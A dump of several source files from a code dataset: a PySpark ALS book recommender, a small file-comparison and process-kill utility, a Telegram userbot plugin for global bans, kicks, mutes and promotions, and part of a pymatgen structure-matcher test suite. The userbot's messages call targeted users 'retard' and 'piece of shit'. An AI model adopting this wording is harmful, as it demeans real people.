predictions.withColumn(\"prediction\", func.round(predictions[\"prediction\"]))\nrmse = evaluator.evaluate(predictions)\n#predictions.show()\n\n# Prediction of rating for test set\npredictions1 = model.transform(test)\npredictions1 = predictions1.withColumn(\"prediction\", func.round(predictions1[\"prediction\"]))\nrmse1 = evaluator.evaluate(predictions1)\nprint('Rank: {} \\tLambda: {:.6f} \\tRMSE Validation: {:.6f} \\tTest Loss: {:.6f}'.format(\n r,\n l,\n rmse,\n rmse1\n ))\n\nprint('Predictions of Ratings on the Validation Data: ')\npredictions.show()\nprint('Schema for validation set predictions: ')\npredictions.printSchema() \n\nprint('Predictions of Ratings on the Test Data: ')\npredictions1.show()\nprint('Schema for test set predictions: ')\npredictions1.printSchema()\n\n# Recommend books for all users\nuser_recs = model.recommendForAllUsers(500)\n\n# user_recs = user_recs.withColumn(\"recommendations.rating\", func.round(user_recs[\"recommendations.rating\"]))\n\nprint('Top 500 Recommendations for each user: ')\nuser_recs1 = model.recommendForAllUsers(500).selectExpr('user_id', 'explode(recommendations)').show()\nuser_recs1 = model.recommendForAllUsers(500).selectExpr('user_id', 'explode(recommendations)')\n\n# Ordering the recommendations by user_id\nuser_recs1.createOrReplaceTempView('user_recs1')\ndisplay = spark.sql('SELECT * FROM user_recs1 ORDER BY user_id')\nprint('After being ordered by user_id: ')\ndisplay.show(50)\n\n# The recommendations for a particular user\nuser = 22000\nprint('Recommendations for user_id', user, 'is: ')\ndisplay = spark.sql('''SELECT * FROM user_recs1 WHERE user_id = 22000''')\ndisplay.show()\nprint(type(user_recs))\nprint(user_recs.printSchema())\n\n# actual_val = val.groupBy(\"user_id\").agg(expr(\"collect_set(book_id) as books\"))\n# pred_val = user_recs.select('user_id','recommendations.book_id')\n# output_val = pred_val.join(actual_val,['user_id']).select('book_id','books')\n# metrics_val = RankingMetrics(output_val.rdd)\n# result_val = metrics_val.meanAveragePrecision\n# print('The MAP is:', result_val)\n\n# Mean Average Precision (Ranking Metric)\nactual_test = test.groupBy(\"user_id\").agg(expr(\"collect_set(book_id) as books\"))\npred_val = user_recs.select('user_id','recommendations.book_id')\noutput_test = pred_val.join(actual_test,['user_id']).select('book_id','books')\nmetrics_test = RankingMetrics(output_test.rdd)\nresult_test = metrics_test.meanAveragePrecision\nprint('The MAP is:', result_test)\n\n# print('Training Set: ')\n# train.show()\n# print(train.count())\n\n# print('Validation Set: ')\n# val.show()\n# print(val.count())\n\n# print('Test Set: ')\n# test.show()\n# print(test.count())","sub_path":"als_implementation.py","file_name":"als_implementation.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80430051","text":"import os\r\nimport subprocess\r\n\r\ndef killprocbyname(s):\r\n import psutil\r\n \r\n # 2. if junk is running, kill it\r\n for proc in psutil.process_iter():\r\n # check whether the process name matches\r\n if proc.name() == s:\r\n print('it\\'s running!')\r\n proc.kill()\r\n \r\ndef catfiles(filelist):\r\n with open('catfile.txt', 'w') as outfile:\r\n for i in filelist:\r\n with open(i, 'r') as infile:\r\n for line in infile:\r\n outfile.write(line)\r\n with open('catfile.txt', 'r') as catfile:\r\n for line in catfile:\r\n print(line)\r\n \r\ndef compare_files(f1, f2):\r\n cmd = str('fc {} {}'.format(f1, f2))\r\n ret = subprocess.getoutput(cmd)\r\n if (ret.endswith('no differences encountered\\n')):\r\n print('matching files!!!!')\r\n return True\r\n return False\r\n \r\n\r\nif __name__ == '__main__':\r\n textfiles = []\r\n print(os.getcwd())\r\n\r\n # 1. List all .txt files\r\n ret = os.listdir()\r\n for i in ret:\r\n #check i ends with '.txt'\r\n if i.endswith('.txt'):\r\n textfiles.append(i)\r\n print(textfiles)\r\n \r\n #ccompare files!\r\n print(compare_files(textfiles[0], textfiles[1]))\r\n \r\n killprocbyname('junk.exe')\r\n \r\n catfiles(textfiles)\r\n\r\n ","sub_path":"TestP3Port/osBIT.py","file_name":"osBIT.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14719432","text":"import asyncio\n\nfrom telethon import events\nfrom telethon.tl.functions.channels import EditAdminRequest\nfrom telethon.tl.types import ChatAdminRights, MessageEntityMentionName\n\nfrom sql import gmute_sql as gsql\nfrom sql.gban_sql import all_gbanned, gbaner, is_gbanned, ungbaner\n\nfrom . import *\n\n\n@Andencento.on(sudo_cmd(pattern=r\"gban ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(allow_sudo=True, pattern=r\"ungmute ?(\\d+)?\"))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=\"listgban$\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=r\"ungban ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(pattern=r\"gkick ?(.*)\", allow_sudo=True))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(sudo_cmd(allow_sudo=True, pattern=r\"gmute ?(\\d+)?\"))\nasync def _(event):\n await Andencento.send_message(event, \"`Sudo Restricted Command Sur`\")\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gban ?(.*)\"))\nasync def _(event):\n user = await eor(event, \"`Gbanning this retard`\")\n reason = \"\"\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n try:\n reason = event.text.split(\" \", maxsplit=1)[1]\n except IndexError:\n reason = \"\"\n elif event.pattern_match.group(1):\n usr = event.text.split(\" \", maxsplit=2)[1]\n userid = await get_user_id(usr)\n try:\n reason = event.text.split(\" \", maxsplit=2)[2]\n except IndexError:\n reason = \"\"\n elif event.is_private:\n userid = (await event.get_chat()).id\n try:\n reason = event.text.split(\" \", maxsplit=1)[1]\n except IndexError:\n reason = \"\"\n else:\n return await eod(\n user, \"**To gban a user i need a userid or reply to his/her message!!**\"\n )\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if userid == ForGo10God:\n return await eod(user, \"🥴 **Nashe me hai kya ‽**\")\n if str(userid) in DEVLIST:\n return await eod(\n user,\n \"😑 **Hey Son Dont gban your father ?¿ K‽**\",\n )\n if is_gbanned(userid):\n return await eod(\n user,\n \"This kid is already gbanned and added to my **Gban Watch!!**\",\n )\n async for gfuck in event.client.iter_dialogs():\n if gfuck.is_group or gfuck.is_channel:\n try:\n await event.client.edit_permissions(\n gfuck.id, userid, view_messages=False\n )\n chats += 1\n except BaseException:\n pass\n gbaner(userid)\n gmsg = f\"🥴 [{name}](tg://user?id={userid}) **Is now GBanned by** {user_mention} **in** `{chats}` **Gbanned this retard**\\n\\n📍 Also Added to Gban Watch!!**!\\n**🔰 Total Chats :** `{chats}`\"\n if reason != \"\":\n gmsg += f\"\\n**🔰 Reason :** `{reason}`\"\n ogmsg = f\"[{name}](tg://user?id={userid}) **Is now GBanned by** {user_mention} **in** `{chats}` **Gbanned this user**\\n\\n**📍 Also Added to Gban Watch!!**!\\n**🔰 Total Chats :** `{chats}`\"\n if reason != \"\":\n ogmsg += f\"\\n**🔰 Reason :** `{reason}`\"\n if Config.ABUSE == \"ON\":\n await user.edit(ogmsg)\n else:\n await user.edit(ogmsg)\n\n\n@Andencento.on(andencento_cmd(pattern=r\"ungban ?(.*)\"))\nasync def _(event):\n user = await eor(event, \"`Ungban in progress...`\")\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n elif event.pattern_match.group(1):\n userid = await get_user_id(event.pattern_match.group(1))\n elif event.is_private:\n userid = (await event.get_chat()).id\n else:\n return await eod(user, \"`Reply to a user or give their userid... `\")\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if not is_gbanned(userid):\n return await eod(user, \"`User is not gbanned.`\")\n async for gfuck in event.client.iter_dialogs():\n if gfuck.is_group or gfuck.is_channel:\n try:\n await event.client.edit_permissions(\n gfuck.id, userid, view_messages=True\n )\n chats += 1\n except BaseException:\n pass\n ungbaner(userid)\n await user.edit(\n f\"📍 [{name}](tg://user?id={userid}) **is now Ungbanned from `{chats}` chats and removed from Gban Watch!! Agli bar se backchodi na karna**\",\n )\n\n\n@Andencento.on(andencento_cmd(pattern=\"listgban$\"))\nasync def already(event):\n gbanned_users = all_gbanned()\n GBANNED_LIST = \"**Gbanned Users :**\\n\"\n if len(gbanned_users) > 0:\n for user in gbanned_users:\n name = (await bot.get_entity(int(user))).first_name\n GBANNED_LIST += f\"📍 [{name}](tg://user?id={user.chat_id})\\n\"\n else:\n GBANNED_LIST = \"No Gbanned Users!!\"\n await edit_or_reply(event, GBANNED_LIST)\n\n\n@Andencento.on(events.ChatAction)\nasync def _(event):\n if event.user_joined or event.added_by:\n user = await event.get_user()\n chat = await event.get_chat()\n if is_gbanned(str(user.id)):\n if chat.admin_rights:\n try:\n await event.client.edit_permissions(\n chat.id,\n user.id,\n view_messages=False,\n )\n gban_watcher = f\"⚠️⚠️**Warning**⚠️⚠️\\n\\n`Gbanned User Joined the chat!!`\\n**⚜️ Retard Id :** [{user.first_name}](tg://user?id={user.id})\\n\"\n gban_watcher += (\n f\"**🔥 Action 🔥** \\n`Banned this piece of shit....` **AGAIN!**\"\n )\n await event.reply(gban_watcher)\n except BaseException:\n pass\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gkick ?(.*)\"))\nasync def gkick(event):\n user = await eor(event, \"`Kicking globally...`\")\n if event.reply_to_msg_id:\n userid = (await event.get_reply_message()).sender_id\n elif event.pattern_match.group(1):\n userid = await get_user_id(event.pattern_match.group(1))\n elif event.is_private:\n userid = (await event.get_chat()).id\n else:\n return await eod(user, \"`Reply to some msg or add their id.`\")\n name = (await event.client.get_entity(userid)).first_name\n chats = 0\n if userid == ForGo10God:\n return await eod(user, \"**🥴 Nashe me hai kya !!**\")\n if str(userid) in DEVLIST:\n return await eod(user, \"**😪 I'm not going to gkick my developer!!**\")\n async for gkick in event.client.iter_dialogs():\n if gkick.is_group or gkick.is_channel:\n try:\n await bot.kick_participant(gkick.id, userid)\n chats += 1\n except BaseException:\n pass\n gkmsg = f\"🏃 **Globally Kicked** [{name}](tg://user?id={userid})'s butts !! \\n\\n📝 **Chats :** `{chats}`\"\n if Config.ABUSE == \"ON\":\n await user.edit(gkmsg)\n else:\n await user.edit(gkmsg)\n\n\n@Andencento.on(andencento_cmd(pattern=r\"gmute ?(\\d+)?\"))\nasync def gm(event):\n private = False\n if event.fwd_from:\n return\n elif event.is_private:\n await eor(event, \"`Trying to gmute user...`\")\n await asyncio.sleep(2)\n private = True\n reply = await event.get_reply_message()\n if event.pattern_match.group(1) is not None:\n userid = event.pattern_match.group(1)\n elif reply is not None:\n userid = reply.sender_id\n elif private is True:\n userid = event.chat_id\n else:\n return await eod(\n event, \"Need a user to gmute. Reply or give userid to gmute them..\"\n )\n event.chat_id\n await event.get_chat()\n if gsql.is_gmuted(userid, \"gmute\"):\n return await eod(event, \"This kid is already Gmuted.\")\n try:\n if str(userid) in DEVLIST:\n return await eod(event, \"**Sorry I'm not going to gmute them..**\")\n except BaseException:\n return\n try:\n gsql.gmute(userid, \"gmute\")\n except Exception as e:\n await eod(event, \"Error occured!\\nError is \" + str(e))\n else:\n await eor(event, \"Shhh.... Now keep quiet !!\")\n\n\n@Andencento.on(andencento_cmd(outgoing=True, pattern=r\"ungmute ?(\\d+)?\"))\nasync def endgmute(event):\n private = False\n if event.fwd_from:\n return\n elif event.is_private:\n await eor(event, \"`Trying to ungmute !!`\")\n await asyncio.sleep(2)\n private = True\n reply = await event.get_reply_message()\n if event.pattern_match.group(1) is not None:\n userid = event.pattern_match.group(1)\n elif reply is not None:\n userid = reply.sender_id\n elif private is True:\n userid = event.chat_id\n else:\n return await eod(\n event,\n \"Please reply to a user or add their into the command to ungmute them.\",\n )\n event.chat_id\n if not gsql.is_gmuted(userid, \"gmute\"):\n return await eod(event, \"I don't remember I gmuted him...\")\n try:\n gsql.ungmute(userid, \"gmute\")\n except Exception as e:\n await eod(event, \"Error occured!\\nError is \" + str(e))\n else:\n await eor(event, \"Ok!! Speak\")\n\n\nmarculs = 9\n\n\nasync def get_full_user(event):\n args = event.pattern_match.group(1).split(\":\", 1)\n extra = None\n if event.reply_to_msg_id and not len(args) == 2:\n previous_message = await event.get_reply_message()\n user_obj = await event.client.get_entity(previous_message.sender_id)\n extra = event.pattern_match.group(1)\n elif len(args[0]) > 0:\n user = args[0]\n if len(args) == 2:\n extra = args[1]\n if user.isnumeric():\n user = int(user)\n if not user:\n await event.edit(\"`Itz not possible without an user ID`\")\n return\n if event.message.entities is not None:\n probable_user_mention_entity = event.message.entities[0]\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n user_obj = await event.client.get_entity(user_id)\n return user_obj\n try:\n user_obj = await event.client.get_entity(user)\n except Exception as err:\n return await event.edit(\n \"Error... Please report at @AndencentoSupport\", str(err)\n )\n return user_obj, extra\n\n\nglobal hawk, moth\nhawk = \"admin\"\nmoth = \"owner\"\n\n\nasync def get_user_from_id(user, event):\n if isinstance(user, str):\n user = int(user)\n try:\n user_obj = await event.client.get_entity(user)\n except (TypeError, ValueError) as err:\n await event.edit(str(err))\n return None\n return user_obj\n\n\n@Andencento.on(andencento_cmd(pattern=\"gpromote ?(.*)\"))\nasync def gben(userbot):\n dc = dark = userbot\n i = 0\n await dc.get_sender()\n me = await userbot.client.get_me()\n await dark.edit(\"`promoting...`\")\n my_mention = \"[{}](tg://user?id={})\".format(me.first_name, me.id)\n f\"@{me.username}\" if me.username else my_mention\n await userbot.get_chat()\n if userbot.is_private:\n user = userbot.chat\n rank = userbot.pattern_match.group(1)\n else:\n userbot.chat.title\n try:\n user, rank = await get_full_user(userbot)\n except BaseException:\n pass\n if me == user:\n await dark.edit(\"U want to promote urself 😑😑 waao..\")\n return\n try:\n if not rank:\n rank = \"ㅤㅤ\"\n except BaseException:\n return await dark.edit(f\"**Something W3NT Wrong 🤔**\")\n if user:\n telchanel = [\n d.entity.id\n for d in await userbot.client.get_dialogs()\n if (d.is_group or d.is_channel)\n ]\n rgt = ChatAdminRights(\n add_admins=False,\n invite_users=True,\n change_info=False,\n ban_users=True,\n delete_messages=True,\n pin_messages=True,\n )\n for x in telchanel:\n try:\n await userbot.client(EditAdminRequest(x, user, rgt, rank))\n i += 1\n await dark.edit(f\"**Promoted in Chats **: `{i}`\")\n except BaseException:\n pass\n else:\n await dark.edit(f\"**Reply to a user you dumbo !!**\")\n return await dark.edit(\n f\"**Globally promoted [{user.first_name}](tg://user?id={user.id})\\n On Chats😏 : {i} **\"\n )\n\n\n@Andencento.on(andencento_cmd(pattern=\"gdemote ?(.*)\"))\nasync def gben(userbot):\n dc = dark = userbot\n i = 0\n await dc.get_sender()\n me = await userbot.client.get_me()\n await dark.edit(\"`demoting...`\")\n my_mention = \"[{}](tg://user?id={})\".format(me.first_name, me.id)\n f\"@{me.username}\" if me.username else my_mention\n await userbot.get_chat()\n if userbot.is_private:\n user = userbot.chat\n rank = userbot.pattern_match.group(1)\n else:\n userbot.chat.title\n try:\n user, rank = await get_full_user(userbot)\n except BaseException:\n pass\n if me == user:\n await dark.edit(\"U want to demote urself 😑😑 waao..\")\n return\n try:\n if not rank:\n rank = \"ㅤㅤ\"\n except BaseException:\n return await dark.edit(f\"**Something W3NT Wrong 🤔**\")\n if user:\n telchanel = [\n d.entity.id\n for d in await userbot.client.get_dialogs()\n if (d.is_group or d.is_channel)\n ]\n rgt = ChatAdminRights(\n add_admins=None,\n invite_users=None,\n change_info=None,\n ban_users=None,\n delete_messages=None,\n pin_messages=None,\n )\n for x in telchanel:\n try:\n await userbot.client(EditAdminRequest(x, user, rgt, rank))\n i += 1\n await dark.edit(f\"**Demoted in Chats **: `{i}`\")\n except BaseException:\n pass\n else:\n await dark.edit(f\"**Reply to a user you dumbo !!**\")\n return await dark.edit(\n f\"**Globally Demoted [{user.first_name}](tg://user?id={user.id})\\n On Chats😏 : {i} **\"\n )\n\n\n@command(incoming=True)\nasync def watcher(event):\n if gsql.is_gmuted(event.sender_id, \"gmute\"):\n await event.delete()\n\n\nCmdHelp(\"global\").add_command(\n \"gban\",\n \"/\",\n \"Globally Bans the mentioned user in 'X' chats you are admin with ban permission.\",\n).add_command(\n \"ungban\", \"/\", \"Globally Unbans the user in 'X' chats you are admin!\"\n).add_command(\n \"listgban\", None, \"Gives the list of all GBanned Users.\"\n).add_command(\n \"gkick\", \"/\", \"Globally Kicks the user in 'X' chats you are admin!\"\n).add_command(\n \"gmute\", \" or \", \"Globally Mutes the User.\"\n).add_command(\n \"ungmute\", \" or \", \"Globally Unmutes the gmutes user.\"\n).add_command(\n \"gpromote\", \" or \", \"Globally promotes the User.\"\n).add_command(\n \"ungdemote\", \" or \", \"Globally demotes the gpromoted user.\"\n).add_info(\n \"Global Admin Tool.\"\n).add_warning(\n \"✅ Harmlesss Module.\"\n).add()\n","sub_path":"plugins/global.py","file_name":"global.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232867784","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\nimport unittest\nimport os\nimport json\nimport numpy as np\nimport itertools\n\nfrom pymatgen.analysis.structure_matcher import StructureMatcher, \\\n ElementComparator, FrameworkComparator, OrderDisorderElementComparator, \\\n OccupancyComparator, PointDefectComparator\nfrom pymatgen.analysis.defects.core import Vacancy, Interstitial, \\\n Substitution\nfrom monty.json import MontyDecoder\nfrom pymatgen.core import PeriodicSite\nfrom pymatgen.core.operations import SymmOp\nfrom pymatgen import Structure, Element, Lattice\nfrom pymatgen.util.coord import find_in_coord_list_pbc\nfrom pymatgen.util.testing import PymatgenTest\n\ntest_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\",\n 'test_files')\n\n\nclass StructureMatcherTest(PymatgenTest):\n _multiprocess_shared_ = True\n\n def setUp(self):\n with open(os.path.join(test_dir, \"TiO2_entries.json\"), 'r') as fp:\n entries = json.load(fp, cls=MontyDecoder)\n self.struct_list = [e.structure for e in entries]\n self.oxi_structs = [self.get_structure(\"Li2O\"),\n Structure.from_file(os.path.join(\n test_dir, \"POSCAR.Li2O\"))]\n\n def test_ignore_species(self):\n s1 = Structure.from_file(os.path.join(test_dir, \"LiFePO4.cif\"))\n s2 = Structure.from_file(os.path.join(test_dir, \"POSCAR\"))\n m = StructureMatcher(ignored_species=[\"Li\"], primitive_cell=False,\n attempt_supercell=True)\n self.assertTrue(m.fit(s1, s2))\n self.assertTrue(m.fit_anonymous(s1, s2))\n groups = m.group_structures([s1, s2])\n self.assertEqual(len(groups), 1)\n s2.make_supercell((2, 1, 1))\n ss1 = m.get_s2_like_s1(s2, s1, include_ignored_species=True)\n self.assertAlmostEqual(ss1.lattice.a, 20.820740000000001)\n self.assertEqual(ss1.composition.reduced_formula, \"LiFePO4\")\n\n self.assertEqual({\n k.symbol: v.symbol for k, v in\n m.get_best_electronegativity_anonymous_mapping(s1, s2).items()},\n {\"Fe\": \"Fe\", \"P\": \"P\", \"O\": \"O\"})\n\n def test_get_supercell_size(self):\n l = Lattice.cubic(1)\n l2 = Lattice.cubic(0.9)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu', 'Ag'], [[0] * 3] * 5)\n s2 = Structure(l2, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n\n sm = StructureMatcher(supercell_size='volume')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (1, True))\n self.assertEqual(sm._get_supercell_size(s2, s1),\n (1, True))\n\n sm = StructureMatcher(supercell_size='num_sites')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (2, False))\n self.assertEqual(sm._get_supercell_size(s2, s1),\n (2, True))\n\n sm = StructureMatcher(supercell_size='Ag')\n self.assertEqual(sm._get_supercell_size(s1, s2),\n (2, False))\n self.assertEqual(sm._get_supercell_size(s2, s1),\n (2, True))\n\n sm = StructureMatcher(supercell_size='wfieoh')\n self.assertRaises(ValueError, sm._get_supercell_size, s1, s2)\n\n def test_cmp_fstruct(self):\n sm = StructureMatcher()\n\n s1 = np.array([[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]])\n s2 = np.array([[0.11, 0.22, 0.33]])\n frac_tol = np.array([0.02, 0.03, 0.04])\n mask = np.array([[False, False]])\n mask2 = np.array([[True, False]])\n\n self.assertRaises(ValueError, sm._cmp_fstruct, s2, s1, frac_tol, mask.T)\n self.assertRaises(ValueError, sm._cmp_fstruct, s1, s2, frac_tol, mask.T)\n\n self.assertTrue(sm._cmp_fstruct(s1, s2, frac_tol, mask))\n self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol / 2, mask))\n self.assertFalse(sm._cmp_fstruct(s1, s2, frac_tol, mask2))\n\n def test_cart_dists(self):\n sm = StructureMatcher()\n l = Lattice.orthorhombic(1, 2, 3)\n\n s1 = np.array([[0.13, 0.25, 0.37], [0.1, 0.2, 0.3]])\n s2 = np.array([[0.11, 0.22, 0.33]])\n s3 = np.array([[0.1, 0.2, 0.3], [0.11, 0.2, 0.3]])\n s4 = np.array([[0.1, 0.2, 0.3], [0.1, 0.6, 0.7]])\n mask = np.array([[False, False]])\n mask2 = np.array([[False, True]])\n mask3 = np.array([[False, False], [False, False]])\n mask4 = np.array([[False, True], [False, True]])\n\n n1 = (len(s1) / l.volume) ** (1 / 3)\n n2 = (len(s2) / l.volume) ** (1 / 3)\n\n self.assertRaises(ValueError, sm._cart_dists, s2, s1, l, mask.T, n2)\n self.assertRaises(ValueError, sm._cart_dists, s1, s2, l, mask.T, n1)\n\n d, ft, s = sm._cart_dists(s1, s2, l, mask, n1)\n self.assertTrue(np.allclose(d, [0]))\n self.assertTrue(np.allclose(ft, [-0.01, -0.02, -0.03]))\n self.assertTrue(np.allclose(s, [1]))\n\n # check that masking best value works\n d, ft, s = sm._cart_dists(s1, s2, l, mask2, n1)\n self.assertTrue(np.allclose(d, [0]))\n self.assertTrue(np.allclose(ft, [0.02, 0.03, 0.04]))\n self.assertTrue(np.allclose(s, [0]))\n\n # check that averaging of translation is done properly\n d, ft, s = sm._cart_dists(s1, s3, l, mask3, n1)\n self.assertTrue(np.allclose(d, [0.08093341] * 2))\n self.assertTrue(np.allclose(ft, [0.01, 0.025, 0.035]))\n self.assertTrue(np.allclose(s, [1, 0]))\n\n # check distances are large when mask allows no 'real' mapping\n d, ft, s = sm._cart_dists(s1, s4, l, mask4, n1)\n self.assertTrue(np.min(d) > 1e8)\n self.assertTrue(np.min(ft) > 1e8)\n\n def test_get_mask(self):\n sm = StructureMatcher(comparator=ElementComparator())\n l = Lattice.cubic(1)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu'], [[0] * 3] * 4)\n s2 = Structure(l, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n\n result = [[True, False, True, False],\n [True, False, True, False],\n [True, True, False, True]]\n m, inds, i = sm._get_mask(s1, s2, 1, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 2)\n self.assertEqual(inds, [2])\n\n # test supercell with match\n result = [[1, 1, 0, 0, 1, 1, 0, 0],\n [1, 1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 0, 0, 1, 1]]\n m, inds, i = sm._get_mask(s1, s2, 2, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 2)\n self.assertTrue(np.allclose(inds, np.array([4])))\n\n # test supercell without match\n result = [[1, 1, 1, 1, 1, 1],\n [0, 0, 0, 0, 1, 1],\n [1, 1, 1, 1, 0, 0],\n [0, 0, 0, 0, 1, 1]]\n m, inds, i = sm._get_mask(s2, s1, 2, True)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 0)\n self.assertTrue(np.allclose(inds, np.array([])))\n\n # test s2_supercell\n result = [[1, 1, 1], [1, 1, 1],\n [0, 0, 1], [0, 0, 1],\n [1, 1, 0], [1, 1, 0],\n [0, 0, 1], [0, 0, 1]]\n m, inds, i = sm._get_mask(s2, s1, 2, False)\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 0)\n self.assertTrue(np.allclose(inds, np.array([])))\n\n # test for multiple translation indices\n s1 = Structure(l, ['Cu', 'Ag', 'Cu', 'Ag', 'Ag'], [[0] * 3] * 5)\n s2 = Structure(l, ['Ag', 'Cu', 'Ag'], [[0] * 3] * 3)\n result = [[1, 0, 1, 0, 0],\n [0, 1, 0, 1, 1],\n [1, 0, 1, 0, 0]]\n m, inds, i = sm._get_mask(s1, s2, 1, True)\n\n self.assertTrue(np.all(m == result))\n self.assertTrue(i == 1)\n self.assertTrue(np.allclose(inds, [0, 2]))\n\n def test_get_supercells(self):\n sm = StructureMatcher(comparator=ElementComparator())\n l = Lattice.cubic(1)\n l2 = Lattice.cubic(0.5)\n s1 = Structure(l, ['Mg', 'Cu', 'Ag', 'Cu'], [[0] * 3] * 4)\n s2 = Structure(l2, ['Cu', 'Cu', 'Ag'], [[0] * 3] * 3)\n scs = list(sm._get_supercells(s1, s2, 8, False))\n for x in scs:\n self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)\n self.assertEqual(len(x[0]), 4)\n self.assertEqual(len(x[1]), 24)\n self.assertEqual(len(scs), 48)\n\n scs = list(sm._get_supercells(s2, s1, 8, True))\n for x in scs:\n self.assertAlmostEqual(abs(np.linalg.det(x[3])), 8)\n self.assertEqual(len(x[0]), 24)\n self.assertEqual(len(x[1]), 4)\n self.assertEqual(len(scs), 48)\n\n def test_fit(self):\n \"\"\"\n Take two known matched structures\n 1) Ensure match\n 2) Ensure match after translation and rotations\n 3) Ensure no-match after large site translation\n 4) Ensure match after site shuffling\n \"\"\"\n sm = StructureMatcher()\n\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n # Test rotational/translational invariance\n op = SymmOp.from_axis_angle_and_translation([0, 0, 1], 30, False,\n np.array([0.4, 0.7, 0.9]))\n self.struct_list[1].apply_operation(op)\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n # Test failure under large atomic translation\n self.struct_list[1].translate_sites([0], [.4, .4, .2],\n frac_coords=True)\n self.assertFalse(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n self.struct_list[1].translate_sites([0], [-.4, -.4, -.2],\n frac_coords=True)\n # random.shuffle(editor._sites)\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n # Test FrameworkComporator\n sm2 = StructureMatcher(comparator=FrameworkComparator())\n lfp = self.get_structure(\"LiFePO4\")\n nfp = self.get_structure(\"NaFePO4\")\n self.assertTrue(sm2.fit(lfp, nfp))\n self.assertFalse(sm.fit(lfp, nfp))\n\n # Test anonymous fit.\n self.assertEqual(sm.fit_anonymous(lfp, nfp), True)\n self.assertAlmostEqual(sm.get_rms_anonymous(lfp, nfp)[0],\n 0.060895871160262717)\n\n # Test partial occupancies.\n s1 = Structure(Lattice.cubic(3),\n [{\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.5}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n s2 = Structure(Lattice.cubic(3),\n [{\"Fe\": 0.25}, {\"Fe\": 0.5}, {\"Fe\": 0.5}, {\"Fe\": 0.75}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n self.assertFalse(sm.fit(s1, s2))\n self.assertFalse(sm.fit(s2, s1))\n s2 = Structure(Lattice.cubic(3),\n [{\"Mn\": 0.5}, {\"Mn\": 0.5}, {\"Mn\": 0.5},\n {\"Mn\": 0.5}],\n [[0, 0, 0], [0.25, 0.25, 0.25],\n [0.5, 0.5, 0.5], [0.75, 0.75, 0.75]])\n self.assertEqual(sm.fit_anonymous(s1, s2), True)\n\n self.assertAlmostEqual(sm.get_rms_anonymous(s1, s2)[0], 0)\n\n def test_oxi(self):\n \"\"\"Test oxidation state removal matching\"\"\"\n sm = StructureMatcher()\n self.assertFalse(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))\n sm = StructureMatcher(comparator=ElementComparator())\n self.assertTrue(sm.fit(self.oxi_structs[0], self.oxi_structs[1]))\n\n def test_primitive(self):\n \"\"\"Test primitive cell reduction\"\"\"\n sm = StructureMatcher(primitive_cell=True)\n self.struct_list[1].make_supercell([[2, 0, 0], [0, 3, 0], [0, 0, 1]])\n self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))\n\n def test_class(self):\n # Tests entire class as single working unit\n sm = StructureMatcher()\n # Test group_structures and find_indices\n out = sm.group_structures(self.struct_list)\n self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])\n self.assertEqual(sum(map(len, out)), len(self.struct_list))\n for s in self.struct_list[::2]:\n s.replace_species({'Ti': 'Zr', 'O': 'Ti'})\n out = sm.group_structures(self.struct_list, anonymous=True)\n self.assertEqual(list(map(len, out)), [4, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1])\n\n def test_mix(self):\n structures = [self.get_structure(\"Li2O\"),\n self.get_structure(\"Li2O2\"),\n self.get_structure(\"LiFePO4\")]\n for fname in [\"POSCAR.Li2O\", \"POSCAR.LiFePO4\"]:\n structures.append(\n 